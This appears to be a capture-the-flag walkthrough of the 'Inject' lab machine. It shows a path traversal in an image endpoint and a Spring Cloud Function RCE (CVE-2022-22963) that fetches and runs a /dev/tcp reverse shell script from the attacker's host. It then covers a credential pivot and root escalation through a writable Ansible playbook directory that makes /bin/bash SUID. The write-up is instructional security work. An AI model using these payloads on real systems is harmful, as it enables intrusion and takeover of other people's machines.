Inject
Enumeration
Rustscan
sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.129.54.43 -- -sV -sC -oA ./{{ip}}
Ports
Open 10.129.54.43:22
Open 10.129.54.43:8080
Services
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Website
The website itself is described as Zodd Cloud which is a place to store, share and collaborate on files and folders. There's not much to the page itself, the registration is disabled and the login button is a dead end.
But there's and upload button wich will take you to a page where you are able to upload files.
Foothold
Exploitation
Upload: LFI & Directory Listing
As always I let Burp run in the background and browse the page, click on everything and check what I got in Burp. After uploading an image I already noticed the URL which looked like a typical target for a LFI.
URL: /show_image?img=cat.png
And as I thought I was able to verify it's vulnerable to LFI and even lists directories! But you would have to either use curl or Burp to see the results as the Webapp tries to display the response as Image.
Display: /etc/passwd
GET /show_image?img=../../../../../../etc/passwd HTTP/1.1
Host: 10.129.54.43:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf
...
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash
...
Display: /etc/systemd/system/webapp.service
GET /show_image?img=../../../../../../../etc/systemd/system/webapp.service HTTP/1.1
Host: 10.129.54.43:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf
[Unit]
Description=Spring WEb APP
After=syslog.target
[Service]
User=frank
Group=frank
ExecStart=/usr/bin/java -Ddebug -jar /var/www/WebApp/target/spring-webapp.jar
Restart=always
StandardOutput=syslog
StandardError=syslog
[Install]
WantedBy=multi-user.target
Inspect: spring-webapp.jar
First I downloaded the webapp which I discovered previously.
wget http://10.129.54.43:8080/show_image?img=../../../../../../var/www/WebApp/target/spring-webapp.jar -O spring-webapp.jar
Let's inspect the application using JD-GUI First thing I did go for was to find the pom.xml which can hold juicy infos
...
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-function-web</artifactId>
<version>3.2.2</version>
</dependency>
...
RCE and Shell
Using the information gathered in the app itself I was able discover that it was affected by CVE-2022-22963. You can find more infos about it HERE
Prepared a shellscript that simply setups a connection back to my machine
#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.139/53 0>&1'
# Setup listener
pwncat-cs -lp 53
# Start http.server
python -m http.server 80
# Shell: Get rev.sh
curl -i -s -k -X 'POST' --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget 10.10.14.139/rev.sh -O /tmp/rev.sh")' 'http://10.129.54.43:8080/functionRouter'
# Shell: Execute rev.sh
curl -i -s -k -X 'POST' --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/rev.sh")' 'http://10.129.54.43:8080/functionRouter'
From Frank to Phil
While looking around I discovered a folder called .m2 in franks home directory. That folder contained a settings.xml which included credentials for the user account of phil.
su - phil
Flag
The flag is located in /home/phil
Escalation
Local Enumeration
User Phil is member of the group staff which could be interesting.
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
Let's see if that group has access to something special
find / -group staff 2>/dev/null
...
/opt/automation/tasks
/var/local
/usr/local/lib/python3.8
/usr/local/lib/python3.8/dist-packages
/usr/local/lib/python3.8/dist-packages/ansible_parallel.py
...
Using pspy I discovered a cronjob that seems to run every 3 minutes and executes ansible-parallel on directory /opt/automation/tasks
2023/03/14 23:18:01 CMD: UID=0 PID=5684 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml
Exploitation
Ansible Parallel is used to run multiple playbooks on the same time. So I guessed that the cronjob is doing something like
/usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/*
Easiest way to abuse that can be seen on gtfobins
echo '[{hosts: localhost, tasks: [shell: /usr/bin/chmod +s /bin/bash]}]' >> /opt/automation/tasks/escalate.yml
Wait for three minutes and you should see something like this
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
Root
bash -p
The flag is then located in /root
Last updated